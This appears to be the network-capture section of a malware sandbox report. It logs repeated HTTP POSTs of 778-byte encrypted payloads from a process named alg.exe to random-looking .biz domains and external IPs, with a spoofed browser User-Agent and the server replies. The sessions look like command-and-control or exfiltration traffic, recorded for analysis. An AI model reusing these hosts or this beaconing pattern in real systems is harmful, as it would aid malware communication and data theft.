                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:29.288985968 CET778OUTData Raw: 1b 02 cd 19 9c 87 5b 51 fe 02 00 00 81 db e6 65 84 b3 f9 8a c4 9c 40 23 d9 49 4e 42 b6 63 e9 a0 85 21 5f 8a d5 20 10 67 94 62 75 36 5f 77 08 f6 aa a0 9b d3 d8 d7 b8 cd fd 49 fa b4 d6 37 98 a7 aa 5f d5 b6 ab 6f 99 f1 17 4d 7b 19 59 f9 c0 57 c7 8f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [Qe@#INBc!_ gbu6_wI7_oM{YW|7[X.wFCH"}V2TKRJbX>:GhLx@Cpi[&+eBy*_~r{-Q-`k *yp/RphG<3[:V/c
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:30.746256113 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ce7f15273a1f8564603b285e6b8fa4c5|155.94.241.188|1730129910|1730129910|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        61192.168.2.44996118.208.156.248806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016619921 CET358OUTPOST /qbvqktfxqsysi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.016639948 CET778OUTData Raw: 9c b3 de 3c f3 07 14 43 fe 02 00 00 56 55 36 0a 7f 8f 87 80 49 6c 47 8f 27 db b2 4c 40 69 94 66 0b 0b d3 fc 99 ff 81 af 3b 70 d6 b0 81 0e 93 52 23 10 e7 f0 fd fd 0c d1 3b 93 e5 fe de 60 de db 34 b1 12 ce f3 3b d4 d0 97 b2 a1 84 e0 b6 29 2a 6f 66
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <CVU6IlG'L@if;pR#;`4;)*ofxyIU]iADxNo]Ec`9kd]|geG$bvSymedV{tF@lRtR|5l1dF<"qN%
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.679272890 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e5d0e2bae940fb3196076ac8c3bab477|155.94.241.188|1730129911|1730129911|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        62192.168.2.44996418.246.231.120806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704221964 CET344OUTPOST /bbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:31.704242945 CET778OUTData Raw: 62 0a d4 64 5e 1d ca 36 fe 02 00 00 4e c7 9c b4 7d ad 82 6d 08 40 b8 52 19 ce 74 48 c8 fd 65 c1 6a 36 36 e9 99 aa 17 38 48 d8 29 92 19 f5 65 38 a6 21 ca 33 65 01 68 4d 39 5f 23 d6 26 f4 da 10 94 be f1 89 67 94 e6 4c ba 7c 71 45 a8 c6 ed 43 01 6a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bd^6N}m@RtHej668H)e8!3ehM9_#&gL|qECjcw_x=[&Uky(8!Q9/O4$9}mcCA< Y^Atk'RMV'~8#DOc7OsOT6s"/J)
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.556171894 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=624309131c28be1336b5555a3c1a11df|155.94.241.188|1730129912|1730129912|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        63192.168.2.44996944.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685003042 CET349OUTPOST /lpoac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:32.685168982 CET778OUTData Raw: d3 15 94 b6 21 5e 59 c3 fe 02 00 00 93 74 43 d1 c7 44 01 32 c6 e2 56 5b 9d 22 26 47 7a 38 93 81 f9 fc 05 87 03 0c 1f 2e 32 3f 1e c8 08 d7 0a 74 15 e0 0a 4c 5d dd f6 df d2 cb c5 82 bd a9 6d bf 64 f4 14 fc c0 4d 24 12 68 67 29 e6 7a 74 bd 8c b1 91
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !^YtCD2V["&Gz8.2?tL]mdM$hg)zt`-gpuJ9Em<VeeZnPw.\.2 &I$n:ms+xqMMbXjmVB}cS0s22[/#Hx}OK


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        64192.168.2.44997544.221.84.105806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.359962940 CET351OUTPOST /jlqmlud HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:33.360002041 CET778OUTData Raw: 16 9e a2 b2 5b 44 8f 8b fe 02 00 00 f0 b6 f4 8a c8 bc 2f 2d 8b e8 0c e7 fd 3a 31 48 91 c0 cf f0 c4 5b 68 b8 a4 49 98 55 05 d9 e6 22 be a5 f4 9b 07 a7 66 78 8e e6 dd 1f b2 7d 7d 76 c3 4b f1 18 b1 d3 15 4b cc 89 a4 ec 2c db 6a 5f 46 01 94 a9 be 6c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: [D/-:1H[hIU"fx}}vKK,j_Fli*e[n']Wk$W_4;sm',=7yq1RpoPB-S1GRFi~V^sg^v ^.Db,+\9QpKux
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.013256073 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1f37de9a91e5f2470514109b65252943|155.94.241.188|1730129913|1730129913|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        65192.168.2.44998154.244.188.177806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET349OUTPOST /ogfkakv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:34.236495018 CET778OUTData Raw: 8b bd 2d 38 af 6f f2 90 fe 02 00 00 8c 04 88 15 98 59 51 a8 86 c4 d5 60 db fb c0 c8 e1 38 de ce d8 4b 9a 35 61 25 00 6b 0b 39 cf 03 01 1b 5b b6 3d 97 c0 7c f7 13 21 6a f6 91 83 1e 31 99 54 57 64 e6 ab c7 7d 9d 7f 19 b1 ce 48 ef ef bc c1 66 81 99
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -8oYQ`8K5a%k9[=|!j1TWd}Hfn[ry*U3d-,(UFSt3=t1wKtzLzb0l.j^g"OQxF$VCX}DFcedKZ{n /.rZ+`2{sif:"fh.L7*Xn
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.097230911 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=2cebecc0e9c64b84737ae8c492546df5|155.94.241.188|1730129914|1730129914|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        66192.168.2.4499873.254.94.185806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124983072 CET347OUTPOST /yefjfs HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:35.124983072 CET778OUTData Raw: e5 3e 16 d6 f2 f5 94 b5 fe 02 00 00 55 18 6b bb ba d2 bf f5 95 76 54 95 06 48 90 af ad 8f ba bf 85 1a e8 4e 61 de 51 89 b2 a1 f6 16 66 c4 2d f6 49 bf a5 5d 6e bd 1e 66 10 16 6a 3f b2 3e 25 42 9c 39 85 39 e8 22 f0 d7 57 31 85 3d 2d 5b 94 d3 78 87
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: >UkvTHNaQf-I]nfj?>%B99"W1=-[x+G8*.s;RJN=m8x08[G#=TS*H~y9Ej|z"=}U\$%D/|=bLkS:#f|&FEL8xTK~TujaVP
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.093620062 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e8d172438e49e52df118c599dcba83f9|155.94.241.188|1730129915|1730129915|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        67192.168.2.44999318.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116564035 CET359OUTPOST /kwcvpyammkduugr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:36.116594076 CET778OUTData Raw: f2 9c 5e 06 b1 79 b8 64 fe 02 00 00 58 bb c8 d8 2f 3c f4 59 78 90 67 a4 d8 3f ec 4d c2 35 fa 8c 5e 4b f5 8c 72 8c 72 8e 59 9a e8 c7 c6 34 eb d5 a6 3e 2a b7 09 6e 46 ba 47 a6 f1 e6 af 7d b7 2e 92 01 d2 2e 8a 9c 59 56 3d 67 ca ef 79 1e cc eb 8f 1b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^ydX/<Yxg?M5^KrrY4>*nFG}..YV=gyWntn&*@?5.USL0t;gHZlvv2.P^F=uXG@M<Pdy+`o'-VDc!Wc7Imy;Z(q4$Uk


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        68192.168.2.44999718.141.10.107806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.368263006 CET360OUTPOST /xodwswpgarjchsqy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:37.368288994 CET778OUTData Raw: 2f 77 22 8b 43 b0 5c 69 fe 02 00 00 26 64 12 c3 11 c3 67 0f 96 0b cf 4e 87 70 2f e6 4c ba d8 c0 88 3f 7d 5e 33 96 c0 eb 00 92 fb e1 91 eb 0c b2 f6 ad c7 6f 25 77 2c 34 4d 6b 6c 93 34 f6 0a 4b 73 31 a3 dc 96 55 b8 00 64 b2 2f 4a ff 80 f3 41 ec fe
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /w"C\i&dgNp/L?}^3o%w,4Mkl4Ks1Ud/JACUKiq&ykEDqX.mE|x&`n@AV8UCVey(v~v]^A %Kg,j/qDj=;oheC}pKC~3je
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.804332018 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a8d542230a0a42b5fad6623a1ca38c2d|155.94.241.188|1730129918|1730129918|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        69192.168.2.45000534.246.200.160806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.827990055 CET351OUTPOST /wyrwafauw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:38.828011990 CET778OUTData Raw: b8 12 43 a6 87 f3 f4 d7 fe 02 00 00 90 77 87 e8 b3 0c 56 3d 68 56 8c fd fc 9a fc 7b a4 59 22 c3 51 6c 56 fe 4f ae a1 5d 67 5f 15 e8 0d 22 86 ea a3 a0 46 37 bc 4c f1 5a 50 6e df 83 e2 04 9d af c6 89 7e 80 aa fe 7b 40 70 3d 2a e6 f4 48 bd 0c 9c 18
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: CwV=hV{Y"QlVO]g_"F7LZPn~{@p=*HfsR>KOIAC5Jdim1|g^P( u@Z<Pre3So}XLV<'Jx6QtL:naWTiT`h}^8s;/Xrd
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.012725115 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 28 Oct 2024 15:38:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b99a98667e4fd4e992b526562a043925|155.94.241.188|1730129919|1730129919|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        70192.168.2.45000947.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.261821985 CET353OUTPOST /lufcjqrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:40.261843920 CET778OUTData Raw: bf f6 7e cb e2 98 b8 01 fe 02 00 00 a2 bd 3e 37 cb 75 4d 05 ab 99 ec 11 32 fd af ac 6d c9 16 5a 4c ce 60 9b e0 d8 92 c8 91 b4 35 9e 40 f8 a0 11 95 86 df bf de da e9 42 46 30 07 1e b1 b0 00 b9 22 5a f5 0d 0f c8 3d cb 32 b6 50 12 74 a4 ec 1a cb 83
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ~>7uM2mZL`5@BF0"Z=2Pt`@C|X+(w)kPb!Ma>^JVSP#vw\!sEve1a$"Ncv)<}GY<Bir


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        71192.168.2.45001447.129.31.212806732C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.335401058 CET350OUTPOST /hfjkd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                        Oct 28, 2024 16:38:41.335414886 CET778OUTData Raw: 64 92 85 a6 0a 76 9c 5b fe 02 00 00 0d 9a 48 c2 3e 42 7f bc 3a 2e 9c 40 71 07 cb f8 84 70 30 c8 d1 c0 15 09 d0 07 e6 bf 71 e8 b9 f9 55 5d 17 72 6f 1a 5f e1 15 da 0d 18 be b9 bd 8e 04 e6 b8 33 4c c1 16 cf 01 31 83 00 8c c9 92 25 cb 40 5f 91 e3 94
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: dv[H>B:.@qp0qU]ro_3L1%@_{xjRL7(m&?)zm~51+I56FWQ9A@)C&kkBJ)HO3L;-BMVRu|3zy6|5'
